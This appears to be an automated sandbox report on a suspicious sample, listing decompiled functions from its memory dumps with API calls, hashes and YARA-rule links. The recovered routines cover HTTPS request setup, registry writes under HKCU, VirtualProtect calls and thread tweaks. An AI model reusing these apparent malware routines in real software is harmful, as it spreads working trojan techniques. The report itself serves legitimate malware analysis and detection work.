HeapFree.KERNEL32(00000000,00000000,?,00B709A6,80000001,?,00B5B0CC,00B5B0DC,?,00B60A99,80000001,?,00B5B0CC), ref: 00B68229
RegQueryValueExA.KERNELBASE(00B5B0CC,?,00000000,00B5B0CC,00000000,00B5B0DC,?,00B709A6,80000001,?,00B5B0CC,00B5B0DC,?,00B60A99,80000001), ref: 00B68248

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 2a42870b1b277b0c33890cbc93461d4d18d5ed13441e9da4db91426310bed11a
Instruction ID: f14929660bbf74b15fe9820acb590baa268358be7d21e1d572d679adb04a85f1
Opcode Fuzzy Hash: 2a42870b1b277b0c33890cbc93461d4d18d5ed13441e9da4db91426310bed11a
Instruction Fuzzy Hash: 9C114CB6900518FFDB129F88DC84CEEBBFDEB89750B104196F905A7120DB715E80EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B05AB2, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00B05AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E00B01A9C(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0xb0d2e0; // 0xdca5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0xb0e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0xb0e8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E00B034C7();
					_push( &_v64);
					if( *0xb0d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E00B034C7();
				}
				return _t28;
			}

0x00b05ab2
0x00b05ab9
0x00b05ac2
0x00b05ac7
0x00b05acb
0x00b05ad5
0x00b05ada
0x00b05adf
0x00b05ae4
0x00b05aee
0x00b05af8
0x00b05af8
0x00b05af0
0x00b05af0
0x00b05af0
0x00b05af0
0x00b05afe
0x00b05b04
0x00b05b05
0x00b05b08
0x00b05b0b
0x00b05b0e
0x00b05b16
0x00b05b1f
0x00b05b27
0x00b05b27
0x00b05b29
0x00b05b2b
0x00b05b2b
0x00b05b35

APIs

Part of subcall function 00B01A9C: SysAllocString.OLEAUT32(00000000), ref: 00B01AF6
Part of subcall function 00B01A9C: SysAllocString.OLEAUT32(0070006F), ref: 00B01B0A
Part of subcall function 00B01A9C: SysAllocString.OLEAUT32(00000000), ref: 00B01B1C

memset.NTDLL ref: 00B05AD5
GetLastError.KERNEL32 ref: 00B05B21

Strings

<, xrefs: 00B05AE4
@MtNt, xrefs: 00B05B21

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MtNt
API String ID: 3736384471-2823972799
Opcode ID: febcc71da434e811d2868ffad2941cb20ce001f9490f18d42eeb7db231d3b7d4
Instruction ID: 12dd6848d05fa48c5354761cd280a72e8b3524fdf40c68b3c1738efc7271f35f
Opcode Fuzzy Hash: febcc71da434e811d2868ffad2941cb20ce001f9490f18d42eeb7db231d3b7d4
Instruction Fuzzy Hash: 61012D31A00218AFCB21EFE4D885EDE7FECAF08780F044565F908AB291E770D9018FA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1719, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A1719(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E1A15C6(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4); // executed
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e1a1722
0x6e1a1727
0x6e1a1735
0x6e1a173a
0x6e1a173a
0x6e1a1740
0x6e1a1745
0x6e1a1749
0x6e1a174d
0x6e1a174d
0x6e1a1757
0x6e1a1760

APIs

GetCurrentThread.KERNEL32 ref: 6E1A171C
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1A1727
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1A173A
SetThreadPriority.KERNELBASE(00000000,00000000,?), ref: 6E1A174D

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 449e612e8894bdacc1bbe97b7673be5c933cd6d6cba373d5c1e49a9ad46d44a5
Instruction ID: 7c775990d3fd39aa24be2caf51cd16c6f9dca3b6373c98eef939788354dcaa6d
Opcode Fuzzy Hash: 449e612e8894bdacc1bbe97b7673be5c933cd6d6cba373d5c1e49a9ad46d44a5
Instruction Fuzzy Hash: DEE092793066112BA6112AAD4D89E7FBBACDF933707110335F621D62D0DB508C46A5A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B07749, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00B07749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E00B01922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E00B04AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E00B01922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6fb0f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E00B04AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E00B01922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0xb0d2e0; // 0xdca5a8
										_t19 = _t42 + 0xb0e758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E00B04AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}

0x00b07749
0x00b07758
0x00b0775e
0x00b0788f
0x00b0788f
0x00b07764
0x00b07764
0x00b0776a
0x00b0776c
0x00b0777c
0x00b0777c
0x00b0776e
0x00b0776e
0x00b07777
0x00b07777
0x00b07770
0x00b07770
0x00b07775
0x00000000
0x00000000
0x00000000
0x00000000
0x00b07775
0x00b0776e
0x00b0778a
0x00b07791
0x00b07794
0x00b0779c
0x00000000
0x00b077a2
0x00b077a4
0x00b077a9
0x00b077ae
0x00000000
0x00b077b4
0x00b077b4
0x00b077bd
0x00b077d4
0x00b077e0
0x00b077e9
0x00b077ec
0x00b077f4
0x00000000
0x00b077fa
0x00b077fd
0x00b07809
0x00b0780f
0x00000000
0x00b07811
0x00b07814
0x00b0781d
0x00b0781d
0x00b07827
0x00b0782e
0x00b07831
0x00b07836
0x00b0783b
0x00000000
0x00b0783d
0x00b0783f
0x00b0784b
0x00b0784e
0x00b07856
0x00b07858
0x00b07869
0x00b07869
0x00b0786b
0x00b0786f
0x00b07870
0x00b07872
0x00b07879
0x00000000
0x00b0787b
0x00b0787b
0x00b0787f
0x00b07880
0x00b07882
0x00b07889
0x00000000
0x00b0788b
0x00b0788b
0x00b0788b
0x00b07889
0x00b07879
0x00b0783b
0x00b0780f
0x00b077bf
0x00b077ca
0x00b077ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00b077ce
0x00b077bd
0x00b077ae
0x00b0779c
0x00b07898

APIs

Part of subcall function 00B01922: lstrlen.KERNEL32(?,00000000,018D9B10,00000000,00B074FF,018D9CEE,?,?,?,?,?,69B25F44,00000005,00B0D00C), ref: 00B01929
Part of subcall function 00B01922: mbstowcs.NTDLL ref: 00B01952
Part of subcall function 00B01922: memset.NTDLL ref: 00B01964

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00B0544C,00000000,00000000,018D9618,?,?,00B02A8A,?,018D9618,0000EA60), ref: 00B07764
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00B0544C,00000000,00000000,018D9618,?,?,00B02A8A,?,018D9618,0000EA60), ref: 00B0788F

Strings

@MtNt, xrefs: 00B0788F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID: @MtNt
API String ID: 4097109750-3251738875
Opcode ID: f92ac00a393225cac4e333034a1009d87b7ab602b772c69b53e1d49de008f0da
Instruction ID: e95b5d651aa900ec12891a57a1b06c90ca991f7dba208284d6f5e95b035c4d88
Opcode Fuzzy Hash: f92ac00a393225cac4e333034a1009d87b7ab602b772c69b53e1d49de008f0da
Instruction Fuzzy Hash: 5C4150B1540308BFDB259FA5CC89EAABFF9EB04740F1085A9F64296091EB71ED45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B0117A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E00B01922(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E00B09371(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E00B04A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0xb0d270, 0, _t25);
				}
				return _t22;
			}

0x00b0117a
0x00b0118b
0x00b0118f
0x00b011ea
0x00b01191
0x00b01198
0x00b011a0
0x00b011a3
0x00b011a8
0x00b011ac
0x00b011b2
0x00b011ba
0x00b011bd
0x00b011d5
0x00b011d5
0x00b011e0
0x00b011e0
0x00b011f1

APIs

Part of subcall function 00B01922: lstrlen.KERNEL32(?,00000000,018D9B10,00000000,00B074FF,018D9CEE,?,?,?,?,?,69B25F44,00000005,00B0D00C), ref: 00B01929
Part of subcall function 00B01922: mbstowcs.NTDLL ref: 00B01952
Part of subcall function 00B01922: memset.NTDLL ref: 00B01964

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,018D9364), ref: 00B011B2
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,018D9364), ref: 00B011E0

Strings

Ut, xrefs: 00B011E0

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: 537a3c40d4c2de1c023302005328071cc689d123a1b9062ffb76c51126761481
Instruction ID: b5ee8a5beb1842747a1c53c421fbc87fc5068c61465b4e1b79b2f14199d5e229
Opcode Fuzzy Hash: 537a3c40d4c2de1c023302005328071cc689d123a1b9062ffb76c51126761481
Instruction Fuzzy Hash: 7A018F36210209BBDB215FA9DC45E9F7FB8FF85754F10442AFA40AA1A1EB71D914CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B9FA, Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5B8B7: RegCreateKeyA.ADVAPI32(80000001,0434B7F0,?), ref: 00B5B8CC
Part of subcall function 00B5B8B7: lstrlen.KERNEL32(0434B7F0,00000000,00000000,00000000,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86), ref: 00B5B8F5

RegQueryValueExA.KERNELBASE(00B667E9,00000000,00000000,?,00B80068,?,00000001,00B667E9,00000001,00000000,74E04D40,?,?,?,00000000,00B667E9), ref: 00B5BA4E
RegSetValueExA.KERNELBASE(00B667E9,00000000,00000000,00000003,00B80068,00000028,?,?,?,00000000,00B667E9), ref: 00B5BA8F
RegCloseKey.ADVAPI32(00B667E9,?,?,?,00000000,00B667E9,?,?,?,?,?,?,?,00B577C7,?), ref: 00B5BA9B

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID:
API String ID: 2552977122-0
Opcode ID: f0b273295294ed45b9984ec6fa3209d705146cf13704f8919e34037eee7d1240
Instruction ID: c30de41ab678bfd84c8fa4d71c075203b09f26999f3c390bf8fecc55b84407a7
Opcode Fuzzy Hash: f0b273295294ed45b9984ec6fa3209d705146cf13704f8919e34037eee7d1240
Instruction Fuzzy Hash: 4E312A75D50218EFDBA1EF94DC84EAEBBF9EB04791F1045A6E804A3220DB704E48DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B05BA4, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00B05BA4(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0xb0d270, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00B0A938(_t57 - _a4, _a4, _t48);
							_t38 = E00B0A938(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00B0A938(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x00b05bac
0x00b05baf
0x00b05bb1
0x00b05bba
0x00b05bcc
0x00b05bcc
0x00b05bd0
0x00b05bd2
0x00b05bd5
0x00b05bd8
0x00b05be1
0x00b05beb
0x00b05bef
0x00b05bf4
0x00b05c04
0x00b05c0a
0x00b05c0e
0x00b05c5d
0x00b05c10
0x00b05c10
0x00b05c19
0x00b05c28
0x00b05c2d
0x00b05c3a
0x00b05c43
0x00b05c4e
0x00b05c55
0x00b05c59
0x00b05c59
0x00b05c0e
0x00b05c64
0x00b05c6b

APIs

lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 00B05BD8
StrStrA.SHLWAPI(00000000,?), ref: 00B05BE5
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B05C04

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: c8caf22ca45a8de4e89f565b5afe6924d6694025967739dae2e808544a0b58a5
Instruction ID: 7cef266c4102b8316f9c5cacff1be53cbca4568d565c5565aca8df94cb463ff7
Opcode Fuzzy Hash: c8caf22ca45a8de4e89f565b5afe6924d6694025967739dae2e808544a0b58a5
Instruction Fuzzy Hash: E4214A36600249AFDF21DF68C884B9EBFB5EF85310F198190E844AB345D730EA15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7092A, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B54375: lstrlen.KERNEL32(?,00000000,?,00000027), ref: 00B543AB
Part of subcall function 00B54375: lstrcpy.KERNEL32(00000000,00000000), ref: 00B543CF
Part of subcall function 00B54375: lstrcat.KERNEL32(00000000,00000000), ref: 00B543D7

RegOpenKeyExA.KERNELBASE(00B60A99,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00B60A99,80000001,?,00B5B0CC), ref: 00B70971
RegOpenKeyExA.ADVAPI32(00B60A99,00B60A99,00000000,00020019,80000001,?,00B60A99,80000001,?,00B5B0CC), ref: 00B70987
RegCloseKey.ADVAPI32(80000001,80000001,?,00B5B0CC,00B5B0DC,?,00B60A99,80000001,?,00B5B0CC), ref: 00B709D0

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID:
API String ID: 4131162436-0
Opcode ID: 6a8cd0290db8756aa9e73e461d6765b3661451d11652b47d8e2876527f847334
Instruction ID: 017e645b4fa2f50cc2c258669f293942e5540c0860f0400f9ae78775dcb42cc6
Opcode Fuzzy Hash: 6a8cd0290db8756aa9e73e461d6765b3661451d11652b47d8e2876527f847334
Instruction Fuzzy Hash: A2216F72911109FFDB01EF98DC81D9EBBFCEB08314B0040A6BA14A3121E730AE55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B05141, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00B05141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00B075F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xb0c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x00b05145
0x00b05152
0x00b05154
0x00b05155
0x00b0515d
0x00b0515d
0x00b05161
0x00000000
0x00000000
0x00b05158
0x00b05159
0x00b0515c
0x00b0515c
0x00b05169
0x00b0516e
0x00b05173
0x00b0517b
0x00b05181
0x00b05183
0x00b05186
0x00b0518a
0x00b0518c
0x00b0518f
0x00b0518f
0x00b05190
0x00b05192
0x00b0518f
0x00b0519c
0x00b0519f
0x00b051a2
0x00b051a3
0x00b051a5
0x00b051ac
0x00b051ac
0x00b051b8

APIs

StrChrA.SHLWAPI(?,00000020,00000000,018D95AC,00B05390,?,00B0935C,?,018D95AC,?,00B05390), ref: 00B0515D
StrTrimA.KERNELBASE(?,00B0C2A4,00000002,?,00B0935C,?,018D95AC,?,00B05390), ref: 00B0517B
StrChrA.SHLWAPI(?,00000020,?,00B0935C,?,018D95AC,?,00B05390), ref: 00B05186

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: c1793f2e71bdb6c028a22196c0f9d7c612f181fb135e74953f56448a774ba23b
Instruction ID: f1928f07cf73c98f5af28d2476b91fcf72796d4eac0aea3bc6458654851c3de8
Opcode Fuzzy Hash: c1793f2e71bdb6c028a22196c0f9d7c612f181fb135e74953f56448a774ba23b
Instruction Fuzzy Hash: 2501BC31700746AFE7305A6A8C49FA77FDDEB95740F140091BA55EB6C2EA70DC028AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B01F72, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00B01F72(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6fb0e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x00b01f79
0x00b01f86
0x00b01f88
0x00b01f8b
0x00b01fd0
0x00b01fd8
0x00b01fde
0x00b01fe2
0x00000000
0x00000000
0x00b01f8f
0x00b01f95
0x00b01f9d
0x00b01fce
0x00000000
0x00000000
0x00b01f9f
0x00b01f9f
0x00b01fa9
0x00b01fad
0x00b01fb6
0x00b01fbe
0x00b01fec
0x00b01fc0
0x00b01fc0
0x00000000
0x00b01fc0
0x00b01fbe
0x00b01fa9
0x00b01fef
0x00b01ff6
0x00b01ff6
0x00000000

APIs

GetLastError.KERNEL32 ref: 00B01F8F
GetLastError.KERNEL32(?,?,?,?,00B046B9,00000000,?,?), ref: 00B01FE6

Strings

@MtNt, xrefs: 00B01F8F, 00B01FE6

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: @MtNt
API String ID: 1452528299-3251738875
Opcode ID: 035be07322397231cb165b4cad817fe63d16980a983c4e21498fb9ff033b8677
Instruction ID: 97f0b7aa23dc97025e246b63c1a9563df655a32793a0bdc1fdbc31cae0ef019f
Opcode Fuzzy Hash: 035be07322397231cb165b4cad817fe63d16980a983c4e21498fb9ff033b8677
Instruction Fuzzy Hash: AE01403190420AFBDB14DF9ADC88DAE7FF9EB94750F1085A6F502E3294DB708A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5BDE7, Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000402,?,?,?,?,00B7794A,00B807F4,?,?,00000402,00B6A538,00B7D590,00000018,00B68D57,?,00000402), ref: 00B5BE19
VirtualProtect.KERNELBASE(00000402,00000004,00000040,00000000,00B807F4,?,?,?,?,00B7794A,00B807F4,?,?,00000402,00B6A538,00B7D590), ref: 00B5BE33
VirtualProtect.KERNELBASE(00000402,00000004,00000000,00000000,?,?,?,00B7794A,00B807F4,?,?,00000402,00B6A538,00B7D590,00000018,00B68D57), ref: 00B5BE66

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ProtectVirtual$lstrlen
String ID:
API String ID: 386137988-0
Opcode ID: 61ac6b6e3abf6577053b87cafd6d009ca931858fac31f3c6872d00a60bf9dcc6
Instruction ID: 6c3128e3d4eef285763f05ee8085a9fe5e04206fb5a94a9457d28cf4d2c974a8
Opcode Fuzzy Hash: 61ac6b6e3abf6577053b87cafd6d009ca931858fac31f3c6872d00a60bf9dcc6
Instruction Fuzzy Hash: EF114C75900208EFEB10CF44C886FDEBBB8EF08755F148089EE049B260C774DA85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B8B7, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,0434B7F0,?), ref: 00B5B8CC
RegOpenKeyA.ADVAPI32(80000001,0434B7F0,?), ref: 00B5B8D6
lstrlen.KERNEL32(0434B7F0,00000000,00000000,00000000,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86), ref: 00B5B8F5

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
